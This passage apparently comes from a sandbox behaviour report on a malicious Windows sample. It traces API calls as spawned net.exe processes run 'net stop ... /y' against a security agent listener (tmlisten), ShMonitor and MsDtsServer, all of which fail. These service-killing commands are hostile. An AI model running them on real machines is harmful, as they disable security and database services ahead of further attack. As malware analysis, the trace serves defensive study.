_String2="TMLISTEN") returned 3 [0204.979] _wcsicmp (_String1="prdr", _String2="TMLISTEN") returned -4 [0204.979] _wcsicmp (_String1="devrdr", _String2="TMLISTEN") returned -16 [0204.979] _wcsicmp (_String1="lanmanworkstation", _String2="TMLISTEN") returned -8 [0204.979] _wcsicmp (_String1="server", _String2="TMLISTEN") returned -1 [0204.979] _wcsicmp (_String1="svr", _String2="TMLISTEN") returned -1 [0204.979] _wcsicmp (_String1="srv", _String2="TMLISTEN") returned -1 [0204.979] _wcsicmp (_String1="lanmanserver", _String2="TMLISTEN") returned -8 [0204.979] _wcsicmp (_String1="alerter", _String2="TMLISTEN") returned -19 [0204.979] _wcsicmp (_String1="netlogon", _String2="TMLISTEN") returned -6 [0204.979] NetServiceControl (in: servername=0x0, service="TMLISTEN", opcode=0x0, arg=0x0, bufptr=0x35faec | out: bufptr=0x35faec) returned 0x889 [0204.980] wcscpy_s (in: _Destination=0x8ea4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0204.980] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0204.980] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x8eb338, nSize=0x800, Arguments=0x8e9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0204.982] GetFileType (hFile=0x26c) returned 0x3 [0204.982] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x713fe8 [0204.982] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x713fe8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0204.982] WriteFile (in: hFile=0x26c, lpBuffer=0x713fe8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x35fa2c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x35fa2c, lpOverlapped=0x0) returned 0 [0204.982] LocalFree (hMem=0x713fe8) returned 0x0 [0204.982] GetFileType (hFile=0x26c) returned 0x3 [0204.982] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x716290 [0204.982] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x716290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nq", lpUsedDefaultChar=0x0) returned 2 [0204.982] WriteFile (in: hFile=0x26c, lpBuffer=0x716290, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x35fa2c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x35fa2c, lpOverlapped=0x0) returned 0 [0204.982] LocalFree (hMem=0x716290) returned 0x0 [0204.982] _ultow (in: _Dest=0x889, _Radix=3537500 | out: _Dest=0x889) returned="2185" [0204.982] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x8eb338, nSize=0x800, Arguments=0x8e9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0204.982] GetFileType (hFile=0x26c) returned 0x3 [0204.982] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x716290 [0204.982] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x716290, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0204.982] WriteFile (in: hFile=0x26c, lpBuffer=0x716290, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x35fa38, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x35fa38, lpOverlapped=0x0) returned 0 [0204.982] LocalFree (hMem=0x716290) returned 0x0 [0204.982] GetFileType (hFile=0x26c) returned 0x3 [0204.982] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x716290 [0204.982] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x716290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nq", lpUsedDefaultChar=0x0) returned 2 [0204.982] WriteFile (in: hFile=0x26c, lpBuffer=0x716290, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x35fa38, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x35fa38, lpOverlapped=0x0) returned 0 [0204.982] LocalFree (hMem=0x716290) returned 0x0 [0204.983] NetApiBufferFree (Buffer=0x711c60) returned 0x0 [0204.983] NetApiBufferFree (Buffer=0x711c78) returned 0x0 [0204.983] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop tmlisten /y" [0204.983] exit (_Code=2) Process: id = "222" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5fcef000" os_pid = "0x850" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop ShMonitor /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 395 os_tid = 0x860 Process: id = "223" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x6afb7000" os_pid = "0x858" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "222" os_parent_pid = "0x850" cmd_line = "C:\\Windows\\system32\\net1 stop ShMonitor /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 396 os_tid = 0x8b8 [0205.118] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x31fe00 | out: lpSystemTimeAsFileTime=0x31fe00*(dwLowDateTime=0x437348a0, dwHighDateTime=0x1d57a87)) [0205.118] GetCurrentProcessId () returned 0x858 [0205.118] GetCurrentThreadId () returned 0x8b8 [0205.118] GetTickCount () returned 0x116ce57 [0205.118] QueryPerformanceCounter (in: lpPerformanceCount=0x31fdf8 | out: lpPerformanceCount=0x31fdf8*=32540232976) returned 1 [0205.118] GetModuleHandleA (lpModuleName=0x0) returned 0x910000 [0205.118] __set_app_type (_Type=0x1) [0205.118] __p__fmode () returned 0x74eb31f4 [0205.118] __p__commode () returned 0x74eb31fc [0205.118] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x91ffe6) returned 0x0 [0205.118] __getmainargs (in: _Argc=0x929064, _Argv=0x92906c, _Env=0x929068, _DoWildCard=0, _StartInfo=0x929024 | out: _Argc=0x929064, _Argv=0x92906c, _Env=0x929068) returned 0 [0205.119] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0205.119] GetConsoleOutputCP () returned 0x1b5 [0205.119] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x929080 | out: lpCPInfo=0x929080) returned 1 [0205.119] SetThreadUILanguage (LangId=0x0) returned 0x409 [0205.122] sprintf_s (in: _DstBuf=0x31fdb8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0205.122] setlocale (category=0, locale=".437") returned="English_United States.437" [0205.124] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0205.124] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0205.124] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ShMonitor /y" [0205.124] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x31fb84, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0205.124] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x0, Size=0x66) returned 0x3f3c00 [0205.124] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0205.125] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x31fd88 | out: Buffer=0x31fd88*=0x3f1c60) returned 0x0 [0205.125] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x31fd88 | out: Buffer=0x31fd88*=0x3f1c78) returned 0x0 [0205.125] _fileno (_File=0x74eb2900) returned -2 [0205.125] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0205.125] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0205.125] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0205.125] _wcsicmp (_String1="config", _String2="stop") returned -16 [0205.125] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0205.125] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0205.125] _wcsicmp (_String1="file", _String2="stop") returned -13 [0205.125] _wcsicmp (_String1="files", _String2="stop") returned -13 [0205.125] _wcsicmp (_String1="group", _String2="stop") returned -12 [0205.125] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0205.125] _wcsicmp (_String1="help", _String2="stop") returned -11 [0205.125] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0205.125] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0205.125] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0205.125] _wcsicmp (_String1="session", _String2="stop") returned -15 [0205.125] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0205.125] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0205.125] _wcsicmp (_String1="share", _String2="stop") returned -12 [0205.125] _wcsicmp (_String1="start", _String2="stop") returned -14 [0205.125] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0205.125] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0205.125] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0205.125] _wcsicmp (_String1="accounts", _String2="ShMonitor") returned -18 [0205.125] _wcsicmp (_String1="computer", _String2="ShMonitor") returned -16 [0205.125] _wcsicmp (_String1="config", _String2="ShMonitor") returned -16 [0205.125] _wcsicmp (_String1="continue", _String2="ShMonitor") returned -16 [0205.125] _wcsicmp (_String1="cont", _String2="ShMonitor") returned -16 [0205.126] _wcsicmp (_String1="file", _String2="ShMonitor") returned -13 [0205.126] _wcsicmp (_String1="files", _String2="ShMonitor") returned -13 [0205.126] _wcsicmp (_String1="group", _String2="ShMonitor") returned -12 [0205.126] _wcsicmp (_String1="groups", _String2="ShMonitor") returned -12 [0205.126] _wcsicmp (_String1="help", _String2="ShMonitor") returned -11 [0205.126] _wcsicmp (_String1="helpmsg", _String2="ShMonitor") returned -11 [0205.126] _wcsicmp (_String1="localgroup", _String2="ShMonitor") returned -7 [0205.126] _wcsicmp (_String1="pause", _String2="ShMonitor") returned -3 [0205.126] _wcsicmp (_String1="session", _String2="ShMonitor") returned -3 [0205.126] _wcsicmp (_String1="sessions", _String2="ShMonitor") returned -3 [0205.126] _wcsicmp (_String1="sess", _String2="ShMonitor") returned -3 [0205.126] _wcsicmp (_String1="share", _String2="ShMonitor") returned -12 [0205.126] _wcsicmp (_String1="start", _String2="ShMonitor") returned 12 [0205.126] _wcsicmp (_String1="stats", _String2="ShMonitor") returned 12 [0205.126] _wcsicmp (_String1="statistics", _String2="ShMonitor") returned 12 [0205.126] _wcsicmp (_String1="stop", _String2="ShMonitor") returned 12 [0205.126] _wcsicmp (_String1="time", _String2="ShMonitor") returned 1 [0205.126] _wcsicmp (_String1="user", _String2="ShMonitor") returned 2 [0205.126] _wcsicmp (_String1="users", _String2="ShMonitor") returned 2 [0205.126] _wcsicmp (_String1="msg", _String2="ShMonitor") returned -6 [0205.126] _wcsicmp (_String1="messenger", _String2="ShMonitor") returned -6 [0205.126] _wcsicmp (_String1="receiver", _String2="ShMonitor") returned -1 [0205.126] _wcsicmp (_String1="rcv", _String2="ShMonitor") returned -1 [0205.126] _wcsicmp (_String1="netpopup", _String2="ShMonitor") returned -5 [0205.126] _wcsicmp (_String1="redirector", _String2="ShMonitor") returned -1 [0205.126] _wcsicmp (_String1="redir", _String2="ShMonitor") returned -1 [0205.126] _wcsicmp (_String1="rdr", _String2="ShMonitor") returned -1 [0205.126] _wcsicmp (_String1="workstation", _String2="ShMonitor") returned 4 [0205.126] _wcsicmp (_String1="work", _String2="ShMonitor") returned 4 [0205.126] _wcsicmp (_String1="wksta", _String2="ShMonitor") returned 4 [0205.126] _wcsicmp (_String1="prdr", _String2="ShMonitor") returned -3 [0205.126] _wcsicmp (_String1="devrdr", _String2="ShMonitor") returned -15 [0205.126] _wcsicmp (_String1="lanmanworkstation", _String2="ShMonitor") returned -7 [0205.126] _wcsicmp (_String1="server", _String2="ShMonitor") returned -3 [0205.126] _wcsicmp (_String1="svr", _String2="ShMonitor") returned 14 [0205.126] _wcsicmp (_String1="srv", _String2="ShMonitor") returned 10 [0205.126] _wcsicmp (_String1="lanmanserver", _String2="ShMonitor") returned -7 [0205.126] _wcsicmp (_String1="alerter", _String2="ShMonitor") returned -18 [0205.126] _wcsicmp (_String1="netlogon", _String2="ShMonitor") returned -5 [0205.127] _wcsupr (in: _String="ShMonitor" | out: _String="SHMONITOR") returned="SHMONITOR" [0205.127] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3f54b8 [0205.129] GetServiceKeyNameW (in: hSCManager=0x3f54b8, lpDisplayName="SHMONITOR", lpServiceName=0x92aaf0, lpcchBuffer=0x31fd24 | out: lpServiceName="", lpcchBuffer=0x31fd24) returned 0 [0205.130] _wcsicmp (_String1="msg", _String2="SHMONITOR") returned -6 [0205.130] _wcsicmp (_String1="messenger", _String2="SHMONITOR") returned -6 [0205.130] _wcsicmp (_String1="receiver", _String2="SHMONITOR") returned -1 [0205.130] _wcsicmp (_String1="rcv", _String2="SHMONITOR") returned -1 [0205.130] _wcsicmp (_String1="redirector", _String2="SHMONITOR") returned -1 [0205.130] _wcsicmp (_String1="redir", _String2="SHMONITOR") returned -1 [0205.130] _wcsicmp (_String1="rdr", _String2="SHMONITOR") returned -1 [0205.130] _wcsicmp (_String1="workstation", _String2="SHMONITOR") returned 4 [0205.130] _wcsicmp (_String1="work", _String2="SHMONITOR") returned 4 [0205.130] _wcsicmp (_String1="wksta", _String2="SHMONITOR") returned 4 [0205.130] _wcsicmp (_String1="prdr", _String2="SHMONITOR") returned -3 [0205.130] _wcsicmp (_String1="devrdr", _String2="SHMONITOR") returned -15 [0205.130] _wcsicmp (_String1="lanmanworkstation", _String2="SHMONITOR") returned -7 [0205.130] _wcsicmp (_String1="server", _String2="SHMONITOR") returned -3 [0205.130] _wcsicmp (_String1="svr", _String2="SHMONITOR") returned 14 [0205.130] _wcsicmp (_String1="srv", _String2="SHMONITOR") returned 10 [0205.130] _wcsicmp (_String1="lanmanserver", _String2="SHMONITOR") returned -7 [0205.130] _wcsicmp (_String1="alerter", _String2="SHMONITOR") returned -18 [0205.130] _wcsicmp (_String1="netlogon", _String2="SHMONITOR") returned -5 [0205.130] NetServiceControl (in: servername=0x0, service="SHMONITOR", opcode=0x0, arg=0x0, bufptr=0x31fd20 | out: bufptr=0x31fd20) returned 0x889 [0205.131] wcscpy_s (in: _Destination=0x92a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0205.131] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0205.133] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x92b338, nSize=0x800, Arguments=0x929dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0205.135] GetFileType (hFile=0x26c) returned 0x3 [0205.135] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x3f3fe8 [0205.135] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x3f3fe8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0205.135] WriteFile (in: hFile=0x26c, lpBuffer=0x3f3fe8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x31fc60, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x31fc60, lpOverlapped=0x0) returned 0 [0205.135] LocalFree (hMem=0x3f3fe8) returned 0x0 [0205.135] GetFileType (hFile=0x26c) returned 0x3 [0205.135] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3f6290 [0205.135] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3f6290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n?", lpUsedDefaultChar=0x0) returned 2 [0205.135] WriteFile (in: hFile=0x26c, lpBuffer=0x3f6290, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x31fc60, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x31fc60, lpOverlapped=0x0) returned 0 [0205.135] LocalFree (hMem=0x3f6290) returned 0x0 [0205.135] _ultow (in: _Dest=0x889, _Radix=3275920 | out: _Dest=0x889) returned="2185" [0205.135] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x92b338, nSize=0x800, Arguments=0x929dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0205.135] GetFileType (hFile=0x26c) returned 0x3 [0205.135] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x3f6290 [0205.135] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x3f6290, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0205.135] WriteFile (in: hFile=0x26c, lpBuffer=0x3f6290, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x31fc6c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x31fc6c, lpOverlapped=0x0) returned 0 [0205.135] LocalFree (hMem=0x3f6290) returned 0x0 [0205.135] GetFileType (hFile=0x26c) returned 0x3 [0205.135] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3f6290 [0205.135] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3f6290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n?", lpUsedDefaultChar=0x0) returned 2 [0205.135] WriteFile (in: hFile=0x26c, lpBuffer=0x3f6290, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x31fc6c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x31fc6c, lpOverlapped=0x0) returned 0 [0205.135] LocalFree (hMem=0x3f6290) returned 0x0 [0205.136] NetApiBufferFree (Buffer=0x3f1c60) returned 0x0 [0205.136] NetApiBufferFree (Buffer=0x3f1c78) returned 0x0 [0205.136] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ShMonitor /y" [0205.136] exit (_Code=2) Process: id = "224" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5fcf4000" os_pid = "0x878" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MsDtsServer /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 397 os_tid = 0x87c Process: id = "225" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x6acd5000" os_pid = "0x2b0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "224" os_parent_pid = "0x878" cmd_line = "C:\\Windows\\system32\\net1 stop MsDtsServer /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 398 os_tid = 0xac4 [0205.313] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30f7cc | out: lpSystemTimeAsFileTime=0x30f7cc*(dwLowDateTime=0x438fd920, dwHighDateTime=0x1d57a87)) [0205.313] GetCurrentProcessId () returned 0x2b0 [0205.313] GetCurrentThreadId () returned 0xac4 [0205.313] GetTickCount () returned 0x116cf12 [0205.313] QueryPerformanceCounter (in: lpPerformanceCount=0x30f7c4 | out: lpPerformanceCount=0x30f7c4*=32559752268) returned 1 [0205.313] GetModuleHandleA (lpModuleName=0x0) returned 0x600000 [0205.313] __set_app_type (_Type=0x1) [0205.313] __p__fmode () returned 0x74eb31f4 [0205.313] __p__commode () returned 0x74eb31fc [0205.313] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x60ffe6) returned 0x0 [0205.314] __getmainargs (in: _Argc=0x619064, _Argv=0x61906c, _Env=0x619068, _DoWildCard=0, _StartInfo=0x619024 | out: _Argc=0x619064, _Argv=0x61906c, _Env=0x619068) returned 0 [0205.314] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0205.314] GetConsoleOutputCP () returned 0x1b5 [0205.314] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x619080 | out: lpCPInfo=0x619080) returned 1 [0205.314] SetThreadUILanguage (LangId=0x0) returned 0x409 [0205.317] sprintf_s (in: _DstBuf=0x30f784, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0205.317] setlocale (category=0, locale=".437") returned="English_United States.437" [0205.319] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0205.319] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0205.319] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MsDtsServer /y" [0205.319] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x30f550, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0205.319] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x6a) returned 0x7d3c10 [0205.319] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0205.320] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x30f754 | out: Buffer=0x30f754*=0x7d1c70) returned 0x0 [0205.320] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x30f754 | out: Buffer=0x30f754*=0x7d1c88) returned 0x0 [0205.320] _fileno (_File=0x74eb2900) returned -2 [0205.320] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0205.320] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0205.320] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0205.320] _wcsicmp (_String1="config", _String2="stop") returned -16 [0205.320] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0205.320] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0205.320] _wcsicmp (_String1="file", _String2="stop") returned -13 [0205.320] _wcsicmp (_String1="files", _String2="stop") returned -13 [0205.320] _wcsicmp (_String1="group", _String2="stop") returned -12 [0205.320] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0205.320] _wcsicmp (_String1="help", _String2="stop") returned -11 [0205.320] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0205.320] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0205.320] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0205.320] _wcsicmp (_String1="session", _String2="stop") returned -15 [0205.320] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0205.320] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0205.320] _wcsicmp (_String1="share", _String2="stop") returned -12 [0205.320] _wcsicmp (_String1="start", _String2="stop") returned -14 [0205.320] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0205.320] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0205.320] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0205.320] _wcsicmp (_String1="accounts", _String2="MsDtsServer") returned -12 [0205.320] _wcsicmp (_String1="computer", _String2="MsDtsServer") returned -10 [0205.320] _wcsicmp (_String1="config", _String2="MsDtsServer") returned -10 [0205.320] _wcsicmp (_String1="continue", _String2="MsDtsServer") returned -10 [0205.321] _wcsicmp (_String1="cont", _String2="MsDtsServer") returned -10 [0205.321] _wcsicmp (_String1="file", _String2="MsDtsServer") returned -7 [0205.321] _wcsicmp (_String1="files", _String2="MsDtsServer") returned -7 [0205.321] _wcsicmp (_String1="group", _String2="MsDtsServer") returned -6 [0205.321] _wcsicmp (_String1="groups", _String2="MsDtsServer") returned -6 [0205.321] _wcsicmp (_String1="help", _String2="MsDtsServer") returned -5 [0205.321] _wcsicmp (_String1="helpmsg", _String2="MsDtsServer") returned -5 [0205.321] _wcsicmp (_String1="localgroup", _String2="MsDtsServer") returned -1 [0205.321] _wcsicmp (_String1="pause", _String2="MsDtsServer") returned 3 [0205.321] _wcsicmp (_String1="session", _String2="MsDtsServer") returned 6 [0205.321] _wcsicmp (_String1="sessions", _String2="MsDtsServer") returned 6 [0205.321] _wcsicmp (_String1="sess", _String2="MsDtsServer") returned 6 [0205.321] _wcsicmp (_String1="share", _String2="MsDtsServer") returned 6 [0205.321] _wcsicmp (_String1="start", _String2="MsDtsServer") returned 6 [0205.321] _wcsicmp (_String1="stats", _String2="MsDtsServer") returned 6 [0205.321] _wcsicmp (_String1="statistics", _String2="MsDtsServer") returned 6 [0205.321] _wcsicmp (_String1="stop", _String2="MsDtsServer") returned 6 [0205.321] _wcsicmp (_String1="time", _String2="MsDtsServer") returned 7 [0205.321] _wcsicmp (_String1="user", _String2="MsDtsServer") returned 8 [0205.321] _wcsicmp (_String1="users", _String2="MsDtsServer") returned 8 [0205.321] _wcsicmp (_String1="msg", _String2="MsDtsServer") returned 3 [0205.321] _wcsicmp (_String1="messenger", _String2="MsDtsServer") returned -14 [0205.321] _wcsicmp (_String1="receiver", _String2="MsDtsServer") returned 5 [0205.321] _wcsicmp (_String1="rcv", _String2="MsDtsServer") returned 5 [0205.321] _wcsicmp (_String1="netpopup", _String2="MsDtsServer") returned 1 [0205.321] _wcsicmp (_String1="redirector", _String2="MsDtsServer") returned 5 [0205.321] _wcsicmp (_String1="redir", _String2="MsDtsServer") returned 5 [0205.321] _wcsicmp (_String1="rdr", _String2="MsDtsServer") returned 5 [0205.321] _wcsicmp (_String1="workstation", _String2="MsDtsServer") returned 10 [0205.321] _wcsicmp (_String1="work", _String2="MsDtsServer") returned 10 [0205.321] _wcsicmp (_String1="wksta", _String2="MsDtsServer") returned 10 [0205.321] _wcsicmp (_String1="prdr", _String2="MsDtsServer") returned 3 [0205.321] _wcsicmp (_String1="devrdr", _String2="MsDtsServer") returned -9 [0205.321] _wcsicmp (_String1="lanmanworkstation", _String2="MsDtsServer") returned -1 [0205.321] _wcsicmp (_String1="server", _String2="MsDtsServer") returned 6 [0205.321] _wcsicmp 